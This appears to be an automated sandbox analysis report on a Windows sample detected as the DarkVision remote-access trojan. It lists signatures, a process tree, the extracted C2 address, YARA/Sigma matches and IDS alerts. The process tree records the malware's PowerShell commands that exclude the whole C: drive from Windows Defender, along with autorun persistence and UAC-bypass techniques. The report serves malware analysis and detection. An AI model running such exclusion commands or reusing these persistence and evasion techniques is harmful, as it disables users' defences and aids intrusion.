Windows Analysis Report
UZPt0hR.exe

Overview

General Information

Sample name: UZPt0hR.exe
Analysis ID: 1657767
MD5: bf6f64455cb1039947a3100e62f96a52
SHA1: 28cdd5c2e82d4ad078420dcbf4b32b928861fcb6
SHA256: c81ece0b60ed50db7d3769388f34ba051a05c95bd026e78dabb6ce08ff91bbba
Tags: DarkVisionRAT, exe, user-aachum

Detection

DarkVision Rat
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates HTML files with .exe extension (expired dropper behavior)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Searches for specific processes (likely to inject)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Windows Binaries Write Suspicious Extensions
Switches to a custom stack to bypass stack traces
Tries to evade analysis by executing a special instruction (VM detection)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to load drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution From GUID Like Folder Names
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • UZPt0hR.exe (PID: 6220 cmdline: "C:\Users\user\Desktop\UZPt0hR.exe" MD5: BF6F64455CB1039947A3100E62F96A52)
    • cmd.exe (PID: 2328 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6764 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • svchost.exe (PID: 4900 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • tzutil.exe (PID: 7928 cmdline: "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" "" MD5: BCBEC32483EB43840823C4F6BD653779)
        • powershell.exe (PID: 8028 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 564 cmdline: powershell Remove-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7952 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • w32tm.exe (PID: 7968 cmdline: "C:\Users\user\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" "" MD5: 15BDC4BD67925EF33B926843B3B8154B)
  • cleanup
Extracted malware configuration: {"C2": "82.29.67.160", "Port": 443}
Source | Rule | Description | Author | Strings
00000000.00000002.1217083129.0000000000434000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
00000000.00000002.1217083129.0000000000434000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000000.00000002.1217880005.0000000000958000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
00000000.00000002.1217880005.0000000000958000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000005.00000002.2447683081.000002684C4A8000.00000002.00001000.00020000.00000000.sdmp | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security

Source | Rule | Description | Author | Strings
5.2.svchost.exe.2684c470000.0.unpack | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
5.2.svchost.exe.2684c470000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
5.2.svchost.exe.2684c470000.0.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x36ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x36e18:$s1: CoGetObject
  • 0x36eb0:$s2: Elevation:Administrator!new:
0.2.UZPt0hR.exe.95bfd8.1.raw.unpack | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
0.2.UZPt0hR.exe.95bfd8.1.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 4900, TargetFilename: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\UZPt0hR.exe", ParentImage: C:\Users\user\Desktop\UZPt0hR.exe, ParentProcessId: 6220, ParentProcessName: UZPt0hR.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 2328, ProcessName: cmd.exe
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 4900, TargetFilename: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\svchost.exe, ProcessId: 4900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\UZPt0hR.exe", ParentImage: C:\Users\user\Desktop\UZPt0hR.exe, ParentProcessId: 6220, ParentProcessName: UZPt0hR.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 2328, ProcessName: cmd.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """, CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\system32\svchost.exe", ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 4900, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """, ProcessId: 7952, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\UZPt0hR.exe", ParentImage: C:\Users\user\Desktop\UZPt0hR.exe, ParentProcessId: 6220, ParentProcessName: UZPt0hR.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 4900, ProcessName: svchost.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2328, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 6764, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\UZPt0hR.exe", ParentImage: C:\Users\user\Desktop\UZPt0hR.exe, ParentProcessId: 6220, ParentProcessName: UZPt0hR.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 4900, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-06T13:44:10.003805+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49695 | 104.26.9.202 | 443 | TCP
2025-04-06T13:44:13.014348+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49698 | 104.26.9.202 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-06T13:44:09.795711+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49694 | 82.29.67.160 | 443 | TCP
2025-04-06T13:44:13.831664+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49699 | 82.29.67.160 | 443 | TCP
2025-04-06T13:44:17.861581+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49700 | 82.29.67.160 | 443 | TCP
2025-04-06T13:44:21.892985+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49702 | 82.29.67.160 | 443 | TCP
2025-04-06T13:44:25.955331+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49704 | 82.29.67.160 | 443 | TCP
2025-04-06T13:44:29.992304+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49742 | 82.29.67.160 | 443 | TCP
2025-04-06T13:44:34.028953+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49783 | 82.29.67.160 | 443 | TCP
2025-04-06T13:44:38.033545+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49784 | 82.29.67.160 | 443 | TCP
2025-04-06T13:44:42.064816+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49785 | 82.29.67.160 | 443 | TCP
2025-04-06T13:44:46.099141+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49786 | 82.29.67.160 | 443 | TCP
2025-04-06T13:44:50.127172+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49787 | 82.29.67.160 | 443 | TCP
2025-04-06T13:44:54.142482+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49788 | 82.29.67.160 | 443 | TCP
2025-04-06T13:44:57.853171+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49790 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:01.283283+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49792 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:04.492557+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49793 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:07.471313+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49794 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:10.268106+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49795 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:12.893716+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49796 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:15.330069+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49797 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:17.676086+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49798 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:19.861199+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49799 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:21.923905+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49800 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:23.893341+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49802 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:25.752018+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49803 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:27.518769+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49804 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:29.220743+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49805 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:30.903302+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49806 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:32.455270+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49807 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:33.986674+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49808 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:35.455483+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49809 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:36.861277+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49810 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:38.236341+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49811 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:39.580138+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49812 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:40.876785+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49813 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:42.158908+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49814 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:43.407964+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49815 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:44.647295+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49816 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:45.845448+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49817 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:47.064438+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49818 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:48.236043+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49819 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:49.408290+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49820 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:50.564819+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49821 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:51.689360+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49822 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:52.813971+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49823 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:53.924518+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49824 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:55.033468+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49825 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:56.110939+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49826 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:57.207136+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49827 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:58.282669+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49828 | 82.29.67.160 | 443 | TCP
2025-04-06T13:45:59.360936+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49829 | 82.29.67.160 | 443 | TCP
2025-04-06T13:46:00.438925+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49830 | 82.29.67.160 | 443 | TCP
2025-04-06T13:46:01.486282+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49831 | 82.29.67.160 | 443 | TCP
2025-04-06T13:46:02.551514+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49832 | 82.29.67.160 | 443 | TCP
2025-04-06T13:46:03.595136+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49833 | 82.29.67.160 | 443 | TCP
2025-04-06T13:46:04.657792+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49834 | 82.29.67.160 | 443 | TCP
2025-04-06T13:46:05.688847+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49835 | 82.29.67.160 | 443 | TCP
2025-04-06T13:46:06.720508+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49836 | 82.29.67.160 | 443 | TCP
2025-04-06T13:46:07.798363+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49837 | 82.29.67.160 | 443 | TCP
2025-04-06T13:46:08.829818+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49838 | 82.29.67.160 | 443 | TCP


AV Detection

Source: UZPt0hR.exe | Avira: detected
Source: 5.2.svchost.exe.2684c470000.0.unpack | Malware Configuration Extractor: DarkVision Rat {"C2": "82.29.67.160", "Port": 443}
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe | ReversingLabs: Detection: 75%
Source: C:\Windows\Temp\K47ZW3T_7928.sys | ReversingLabs: Detection: 33%
Source: UZPt0hR.exe | Virustotal: Detection: 57%
Source: Submitted Sample | Neural Call Log Analysis: 99.7%
Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_00405110 LocalAlloc,_memset,CryptBinaryToStringW,CryptBinaryToStringW,_memset,LocalFree,WaitForSingleObject,RtlExitUserThread,_memset,_memset,_memset,_memset,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,0_2_00405110
Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_0041CFE0 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,0_2_0041CFE0
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C4753B0 LocalAlloc,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,CryptBinaryToStringW,CryptBinaryToStringW,lstrcpyW,LocalFree,WaitForSingleObject,RtlExitUserThread,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,5_2_000002684C4753B0
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C48DC00 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,5_2_000002684C48DC00
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C48DD5A CryptReleaseContext,CryptDestroyHash,5_2_000002684C48DD5A
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C48DCF7 CryptReleaseContext,CryptDestroyHash,5_2_000002684C48DCF7
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C48DD1E CryptReleaseContext,CryptDestroyHash,5_2_000002684C48DD1E
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C48DD8F CryptReleaseContext,CryptDestroyHash,5_2_000002684C48DD8F
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_008082FC malloc,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,free,15_2_008082FC
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_0084F028 CryptGenRandom,RegSetValueExA,GetWindowsDirectoryW,15_2_0084F028
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_007F71EA CryptAcquireContextA,CryptCreateHash,15_2_007F71EA
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_007F71E8 CryptAcquireContextA,CryptCreateHash,15_2_007F71E8
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_007F7244 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,15_2_007F7244
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_007FE4C4 CryptAcquireContextA,CryptCreateHash,15_2_007FE4C4
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_00808478 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_00808478
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_007FE510 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,15_2_007FE510
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: -----BEGIN PUBLIC KEY----- 15_2_007E3268
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: -----BEGIN PUBLIC KEY----- 15_2_0080F214
Source: tzutil.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match | File source: 5.2.svchost.exe.2684c470000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UZPt0hR.exe.95bfd8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UZPt0hR.exe.95bfd8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UZPt0hR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1217083129.0000000000434000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1217880005.0000000000958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2447683081.000002684C4A8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: UZPt0hR.exe PID: 6220, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4900, type: MEMORYSTR
Source: UZPt0hR.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.26.9.202:443 -> 192.168.2.6:49695 version: TLS 1.2
Source: C:\Windows\System32\svchost.exe | Code function: 5_2_000002684C4797F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,5_2_000002684C4797F0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_008235CC FindFirstFileA,FindNextFileA,FindClose,15_2_008235CC
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe | Code function: 15_2_00841C54 __doserrno,_errno,_errno,__doserrno,FindFirstFileA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,15_2_00841C54

Networking

Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49694 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49699 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49700 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49702 -> 82.29.67.160:443
Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49704 -> 82.29.67.160:443
